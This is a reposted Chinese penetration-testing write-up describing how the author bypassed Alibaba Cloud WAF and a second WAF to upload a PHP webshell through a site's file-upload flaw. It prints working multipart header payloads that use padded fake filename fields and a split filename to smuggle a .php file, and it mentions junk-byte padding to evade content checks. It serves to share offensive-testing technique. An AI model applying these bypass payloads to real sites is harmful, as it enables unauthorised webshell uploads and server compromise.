记一次绕过阿里云waf与某不知名waf的双waf上传getshell

02.5W+0
华盟原创文章投稿奖励计划

文章来源:奇安信攻防社区

链接:https://forum.butian.net/share/4069

作者:张三一号

本文记录了一次绕过阿里云waf与某不知名waf的双waf上传getshell

0x00:前情提要

某次项目遇到一个站点,发现后台存在任意文件上传,简单探测一下,发现是阿里云waf。

自动草稿

自动草稿

那必须开绕了

0x01:fuzz

之前没有过对阿里云waf的上传绕过,所以要从头开始,按流程来。

先来个大部分waf通杀的绕过,大包绕过,结果数据量太大直接无响应,寄

自动草稿

尝试单双引号绕过,失败

复写filename,失败

换行绕过,失败

修改boundary,失败

文件名fuzz,失败

…..尝试多次均无果

0x02:柳暗花明

前几天看见一个姿势拿来试一试。

Content-Disposition: form-data; name=”aaa”; ;filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.php”

发现最终传上去的是个txt,显然最后的php并没有生效,有效的filename必须是在分号后的filename,所以其实上述payload和下面的payload是等价的,只有第一个filename被接口有效识别了。

Content-Disposition: form-data; name=”aaa”;filename=”a.txt”

但是值得注意的是,此payload成功绕过了waf的检测,虽然最终没有上传php文件,但是可能有戏。(由于接口已经没了,所以这里显示404,但是确实绕过了waf)

自动草稿

由于前面我们研究过,只有分号后跟的filename才是有效的filename,所以尝试让前面的filename失效,让最后一个filename生效,构造payload如下

Content-Disposition: form-data; name=”aaa”;,filename=”a.txt”;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;filename=”a.php”;

果然还是被拦截了。

自动草稿

但是或许可以根据这个payload继续展开一下。

在fuzz的时候还发现这个网站还有一个比较奇怪的地方,就是当filename中的文件名被换行分割的时候,最后一行加入冒号,如下

Content-Disposition: form-data; name=”head_portrait”;filename=”a.p hp”:

就会将.p作为文件后缀上传

自动草稿

但是不加这个冒号的话,就会被waf拦截

自动草稿

那结合上面的假filename绕过试一试呢

Content-Disposition: form-data; name=”aaa”;,filename=”a.t xt”:;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;filename=”a.php”;

确实不是405了,但是为什么返回变成了502,难道还有高手?

自动草稿
将php更换为txt,发现可以正常使用,并不是语法有问题,所以很可能还有个什么waf,难道是百年难遇的双waf出现了?

Content-Disposition: form-data; name=”aaa”;,filename=”a.t xt”:;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;filename=”a.txt”;

目前看起来没有阿里云waf报错,应该是已经绕过阿里云了,看来想办法绕过502这个就可以了。

自动草稿
多次测试后,发现只要多加几个无效的filename即可绕过502这个waf
Content-Disposition: form-data; name=”aaa”;,filename=”a.t xt”:,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”,filename=”a.txt”;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;filename=”a.php”;
到此成功绕过双waf上传php文件,

自动草稿

自动草稿
紧接着新的问题出现了,阿里云waf不只拦截filename,它还会拦截文件内容。

自动草稿

又来

由于阿里云waf对php脚本内容极其敏感,所以单纯从webshell本身来说是很难绕过的,所以我们需要用一些旁门左道进行绕过,比如垃圾字符,没有塞多少垃圾字符便成功绕过。

自动草稿
好景不长,尝试了一些webshell,竟然还是被拦截…

自动草稿
掏出大宝贝多试几个

自动草稿
好险有个能用的

自动草稿
接下来直接连接即可,开梭

自动草稿

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
渗透测试
喜欢就支持一下吧
点赞0 分享
guaigou的头像-华盟网
HW在即,今日分享|常用的渗透测试工具及相关资料整理,查收!-华盟网
HW在即,今日分享|常用的渗透测试工具及相关资料整理,查收!
HW在即,今日分享|常用的渗透测试工具及相关资料整理,查收!
2年前 29.1W+
重磅|华盟HW工程师招募-华盟网
重磅|华盟HW工程师招募
重磅|华盟HW工程师招募
4年前 27.4W+
最难就业季|“本想先读书躲一躲,谁料行情还不如两年前”-华盟网
最难就业季|“本想先读书躲一躲,谁料行情还不如两年前”
最难就业季|“本想先读书躲一躲,谁料行情还不如两年前”
4年前 25.8W+
挖矿病毒“盯上”了 Docker 服务器-华盟网
挖矿病毒“盯上”了 Docker 服务器
挖矿病毒“盯上”了 Docker 服务器
4年前 24.1W+
让所有反病毒引擎都无法检测到的恶意软件出现了!-华盟网
让所有反病毒引擎都无法检测到的恶意软件出现了!
让所有反病毒引擎都无法检测到的恶意软件出现了!
4年前 23.8W+
功能太强大!网络犯罪论坛新成员Prynt Stealer无所不盗-华盟网
功能太强大!网络犯罪论坛新成员Prynt Stealer无所不盗
功能太强大!网络犯罪论坛新成员Prynt Stealer无所不盗
4年前 23.1W+
相关推荐
一个免杀钓鱼思路分享-华盟网
一个免杀钓鱼思路分享
一个免杀钓鱼思路分享
6年前 22.6W+
实战 | 记一次较为详细的代码审计过程-华盟网
实战 | 记一次较为详细的代码审计过程
实战 | 记一次较为详细的代码审计过程
4年前 17.1W+
实战 | 记一次较为详细的代码审计过程-华盟网
实战 | 记一次较为详细的代码审计过程
实战 | 记一次较为详细的代码审计过程
4年前 15.9W+
【渗透测试】看怎么搞定黄网!-华盟网
【渗透测试】看怎么搞定黄网!
【渗透测试】看怎么搞定黄网!
10年前 15.9W+
使用LUKS加密分区-华盟网
使用LUKS加密分区
使用LUKS加密分区
8年前 15.5W+
解码内置不安全“加密芯片”的勒索软件Gomasom-华盟网
解码内置不安全“加密芯片”的勒索软件Gomasom
解码内置不安全“加密芯片”的勒索软件Gomasom
9年前 15.1W+
评论 抢沙发

请登录后发表评论

    暂无评论内容